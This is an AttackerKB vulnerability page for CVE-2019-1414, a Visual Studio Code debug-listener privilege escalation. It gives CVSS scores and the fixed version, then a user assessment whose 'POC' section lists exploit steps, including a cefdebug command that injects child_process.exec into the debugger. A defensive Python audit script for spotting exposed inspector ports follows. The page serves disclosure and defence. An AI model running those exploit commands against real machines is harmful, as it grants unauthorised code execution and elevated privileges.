AttackerKB AKB:A51CC742-F2B2-4457-874B-FACA8009E8C2
Jan 24, 2020 - 12:00 a.m.

CVE-2019-1414

2020-01-24 00:00:00
attackerkb.com
14

CVSS3: 7.8 High

Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS2: 7.2 High

Access Vector: LOCAL
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

An elevation of privilege vulnerability exists in Visual Studio Code when it exposes a debug listener to users of a local computer, aka ‘Visual Studio Code Elevation of Privilege Vulnerability’.

Recent assessments:

goodlandsecurity at May 20, 2020 2:28am UTC reported:

Vulnerability:

  • An elevation of privilege vulnerability exists in Visual Studio Code when it exposes a debug listener to users of a local computer. A local attacker who successfully exploited the vulnerability could inject arbitrary code to run in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Software Versions Affected:

  • All versions < 1.39.1

Vulnerability Severity:

  • High

Vulnerability Fix:

  • Upgrade VS Code to version 1.39.1 or later.

Vulnerability POC:

  • If Visual Studio Code runs as Administrator, privileges can be elevated to the highest level, i.e. NT AUTHORITY\SYSTEM.

  • If Visual Studio Code runs as another user, command execution can be achieved as that user.

  • If Visual Studio Code runs in High Integrity context, any UAC settings can be bypassed and can elevate from Low/Medium levels.

  • Linux (Article detailing the exploit):

    1. ps aux | grep inspect
    • Find the debug port
    2. node index.js 127.0.0.1 <PORT> <COMMAND>
    • Run index.js supplied with the IP address, port, and command you want to run
  • Windows:

    1. ./cefdebug.exe
    • Find the debug port

    • cefdebug is a minimal commandline utility and/or reference code for using libwebsockets to connect to an electron/CEF/chromium debugger.
    2. ./cefdebug.exe --url ws://127.0.0.1:<PORT>/<UUID> --code "process.mainModule.require('child_process').exec('<COMMAND>')"

    • Run cefdebug supplied with the debug websocket URL and the command you want to run

Assessed Attacker Value: 5
Assessed Attacker Value: 3
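
An added example, not part of the original assessment or of VS Code itself: a host audit that parses `ps aux` output for Node/Electron inspector flags and compares a `code --version` string against the fixed release 1.39.1. The process listing, users and paths are constructed, and the flag set (Node's `--inspect` family plus VS Code's `--inspect-extensions` options) is an assumption about what to look for.

```python
import re

FIXED = (1, 39, 1)  # first fixed VS Code release according to the advisory above
# Assumed flag set: --inspect, --inspect-brk, --inspect-port, --inspect[-brk]-extensions
FLAG = re.compile(r"(?<!\S)--inspect(?:-brk)?(?:-extensions|-port)?(?:=(\S+))?(?!\S)")

# Constructed `ps aux` output; users, PIDs and paths are sample values.
SAMPLE_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
alice 4121 1.0 2.1 905000 84000 ? Sl 09:12 0:04 /usr/share/code/code --type=renderer
alice 4188 0.5 1.3 620000 52000 ? Sl 09:12 0:02 /usr/share/code/code --inspect=41397 bootstrap-fork --type=extensionHost
root 5012 0.2 1.0 600000 40000 ? Sl 09:30 0:01 /usr/share/code/code --inspect-brk=0.0.0.0:9333 bootstrap-fork
bob 5100 0.0 0.0 9000 900 pts/1 S+ 09:31 0:00 grep inspect
"""

def parse_listener(value):
    """Return (host, port) for a flag value; Node defaults to 127.0.0.1:9229."""
    host, port = "127.0.0.1", 9229
    if value:
        head, sep, tail = value.rpartition(":")
        if tail.isdigit():
            host, port = (head if sep else host), int(tail)
        else:
            host = value  # host given without a port
    return host, port

def find_debug_listeners(ps_output):
    """List processes whose command line enables a Node/Electron inspector."""
    findings = []
    for line in ps_output.splitlines()[1:]:        # skip the header row
        cols = line.split(None, 10)                # COMMAND is the 11th column
        m = FLAG.search(cols[10]) if len(cols) == 11 else None
        if m:
            host, port = parse_listener(m.group(1))
            findings.append({"user": cols[0], "pid": int(cols[1]), "host": host,
                             "port": port, "elevated": cols[0] == "root",
                             "non_loopback": host not in ("127.0.0.1", "localhost", "[::1]")})
    return findings

def is_patched(version_output):
    """True when the first line of `code --version` output is at least FIXED."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version_output.strip())
    return bool(m) and tuple(map(int, m.groups())) >= FIXED

if __name__ == "__main__":
    for finding in find_debug_listeners(SAMPLE_PS):
        print(finding)
    print("1.38.1 patched:", is_patched("1.38.1"))
```

Findings marked `elevated` or `non_loopback` deserve attention first, since the assessment above ties impact to the account VS Code runs under.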
